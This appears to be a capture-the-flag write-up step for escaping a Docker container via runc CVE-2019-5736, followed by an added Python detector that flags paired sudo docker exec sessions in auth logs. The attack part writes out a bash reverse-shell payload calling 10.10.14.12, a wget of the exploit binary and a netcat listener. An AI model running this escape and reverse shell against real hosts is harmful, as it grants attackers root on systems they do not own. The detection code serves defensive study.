🖥️ -k4u5h41- #️⃣ CVE-2019-5736
The machine is vulnerable to CVE-2019-5736, so follow the steps in Runc exploit (CVE-2019-5736). Download the file main.go and change the payload in the file to:
var payload = "#!/bin/bash \n bash -i >& /dev/tcp/10.10.14.12/1234 0>&1"
After that, run:
go build main.go
Host an HTTP server:
python3 -m http.server
Then open 3 terminals as below:
Terminal 1
sudo /usr/bin/docker exec -it webapp-dev01 /bin/bash
wget http://10.10.14.12/main
chmod +x main
./main
Terminal 2
sudo /usr/bin/docker exec -it webapp-dev01 /bin/sh
Terminal 3
nc -nlvp 1234
Once you run ./main in the first SSH terminal, immediately run the second command in the second SSH terminal; you will then get the netcat reverse shell in terminal 3.
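From the defender's side, the procedure above leaves a trace in the sudo log: the same user opens two docker exec sessions into one container within a short interval. The following Python detection is an added example, not part of the original writeup. It assumes the standard sudo syslog line format; the user names, host name, timestamps, year and the 60-second window are constructed for illustration.

```python
import re
from datetime import datetime, timedelta

# Constructed sudo auth-log lines (sample data, not from the original page).
SAMPLE_LOG = """\
Feb 12 10:01:03 host sudo:   devuser : TTY=pts/0 ; PWD=/home/devuser ; USER=root ; COMMAND=/usr/bin/docker exec -it webapp-dev01 /bin/bash
Feb 12 10:01:41 host sudo:   devuser : TTY=pts/1 ; PWD=/home/devuser ; USER=root ; COMMAND=/usr/bin/docker exec -it webapp-dev01 /bin/sh
Feb 12 11:30:00 host sudo:   operator : TTY=pts/2 ; PWD=/home/operator ; USER=root ; COMMAND=/usr/bin/docker exec -u root -it db01 /bin/bash
Feb 12 15:00:00 host sudo:   devuser : TTY=pts/0 ; PWD=/home/devuser ; USER=root ; COMMAND=/usr/bin/docker ps
"""

LINE_RE = re.compile(r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sudo(?:\[\d+\])?:\s+(\S+) : .*?COMMAND=\S*docker exec (.+)$")
# docker exec options that consume the following token as their value.
VALUE_OPTS = {"-e", "--env", "--env-file", "-u", "--user", "-w", "--workdir", "--detach-keys"}


def exec_target(args):
    """Return the container name from the arguments that follow 'docker exec'."""
    tokens = args.split()
    i = 0
    while i < len(tokens):
        if tokens[i] in VALUE_OPTS:
            i += 2  # skip the option and its value
        elif tokens[i].startswith("-"):
            i += 1  # flag without a separate value, e.g. -it
        else:
            return tokens[i]
    return None


def rapid_exec_pairs(log_text, window_s=60, year=2019):
    """Flag a user opening two exec sessions into one container within window_s seconds."""
    sessions = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        when = datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S")
        container = exec_target(m.group(3))
        if container:
            sessions.setdefault((m.group(2), container), []).append(when)
    hits = []
    for (user, container), times in sessions.items():
        times.sort()
        for first, second in zip(times, times[1:]):
            if second - first <= timedelta(seconds=window_s):
                hits.append((user, container, first.strftime("%H:%M:%S"), second.strftime("%H:%M:%S")))
    return hits
```

A hit is a prompt for review rather than proof of exploitation; comparing the host runc binary against the package manager's checksum is the follow-up check.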